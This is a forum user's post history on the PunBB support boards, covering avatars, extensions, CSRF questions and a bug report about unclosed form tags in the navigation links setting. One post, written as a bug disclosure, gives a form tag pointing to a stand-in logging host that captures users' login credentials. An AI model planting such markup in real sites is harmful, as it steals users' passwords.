gotcha, thanks!
2 2012-01-14 16:24
Re: extension dev: xsrf/csrf (4 replies, posted in Discussions)
So this is actually for some AJAX GETs, is the theory the same?
(thanks for the response)
3 2012-01-14 11:07
Topic: extension dev: xsrf/csrf (4 replies, posted in Discussions)
Hi
I'm working on an extension that takes user input and I want to make sure it is safe from XSRF/CSRF attacks. I understand punbb has its own methods to secure it from such attacks, is there any way I might use these or should I implement my own?
4 2008-07-09 10:12
Re: No more big avatars? (5 replies, posted in PunBB 1.3 troubleshooting)
But don't you see my point? If the style is basically setting a max by having the overlapping on text then the whole code may as well say that the max is that max.. this new way doesn't make any sense
5 2008-07-08 18:06
Re: [release] pun_repository (12 replies, posted in PunBB 1.3 extensions)
I would make a request to have this also support CURL making it compatiable with some of the larger webhosts such as Dreamhost
6 2008-07-08 17:54
Re: No more big avatars? (5 replies, posted in PunBB 1.3 troubleshooting)
Understood, but it's a small forum so I allowed people to have very wide avatars, this was fine in 1.2 as they didn't overlap the text in 1.3 they cover the content of posts.
Surely there's no point in having a usersettable make if it's going to overlap?
7 2008-07-08 17:33
Re: [mod release] Last 24 hours visited users (12 replies, posted in PunBB 1.3 extensions)
awesome
8 2008-07-08 16:38
Topic: No more big avatars? (5 replies, posted in PunBB 1.3 troubleshooting)
Upgraded today, a lot of the users on my forum have wide avatars. This was never a problem with 1.2 but it is now, they overlap, anyway to fix this or do I just have to limit my users?
9 2008-07-08 16:35
Re: [mod release] Last 24 hours visited users (12 replies, posted in PunBB 1.3 extensions)
hey please make an extension of this!
10 2008-07-08 16:28
Re: Getting around maintenance mode (4 replies, posted in PunBB 1.3 troubleshooting)
Remember to clear the cache! This had be stumped for a while
11 2007-06-13 12:46
Re: Online bug: 1 user online twice? (9 replies, posted in PunBB 1.2 bug reports)
I've had this error a few times, but not often, if i get it only very rarely does it mean i messed up an upgrade or not?
12 2006-06-28 11:28
Re: Unclosed Form tag in navlinks (10 replies, posted in PunBB 1.2 troubleshooting)
Fair enough, but I disagree with the assumption that the administrator can modify templates, I am an administrator on punbb boards where I have access to nothing but punbb.
13 2006-06-27 14:38
Re: Unclosed Form tag in navlinks (10 replies, posted in PunBB 1.2 troubleshooting)
Are you honestly suggesting that a serious security vulnerability shouldn't be fixed because it might be hard to solve?
Surely this is intended only for links and if you did want to add anything else you would simply edit the template.
A solution doesn't come to mind immediately but I think this is a bug that should be considered.
14 2006-06-27 13:55
Re: Unclosed Form tag in navlinks (10 replies, posted in PunBB 1.2 troubleshooting)
O.K. here's a scenario that will surely prove to you guys it's a bug.
Rogue Admin wants to steal usernames and passwords, so he adds a link to <form action="http://hissite.com/logger.php" method="POST">
logger.php is a script that logs all data submitted to it.
Now whenever a user tries to login they submit their login details to the rogue administrators website. I've tested this and it works.
Is that not bugworthy?
Now that it's intentional and not due to user stupidity (which is something that should be considered) will you accept this as a bug?
I admit that rogue administrators aren't likely, but it is quite possible and could result in a lot of stolen usernames and passwords.
15 2006-06-27 13:53
Re: Unclosed Form tag in navlinks (10 replies, posted in PunBB 1.2 troubleshooting)
Surely the people incapable of changing things manually or more likely to mess things up?
In this case where it not for me my friend would probably wouldn't have been able to solve his problem..
16 2006-06-27 13:30
Re: Unclosed Form tag in navlinks (10 replies, posted in PunBB 1.2 troubleshooting)
My point is that it's a user error that, due to the way punbb deals with it, is impossible to fix without some form of editing that is above punbb. Meaning that some users of PunBB (without MySQL/PHP knowledge or perhaps access to MySQL or to modify PHP) could render their PunBB install completely useless with a simple user mistake.
Is that not a bug? I don't think you can dismiss this simply because users should have read the manual..
17 2006-06-27 12:59
Topic: Unclosed Form tag in navlinks (10 replies, posted in PunBB 1.2 troubleshooting)
Not a serious bug, just a big annoyance if you do do it.
A friend tried to add a paypal link to his links ("Additional menu items"), he basically did
<form action="http://paypal.com/..">
as a link, this wouldn't actually work but I think he was just playing around, anyway, the problem is that from then whenever he tried to do anything form related (admin, logging in, registering, etc. etc.) the site just went to paypal.com. I know he shouldn't have added the unclosed form tag, but the problem is that IF you do then it's impossible to actually remove it without editing the header or manually altering the database.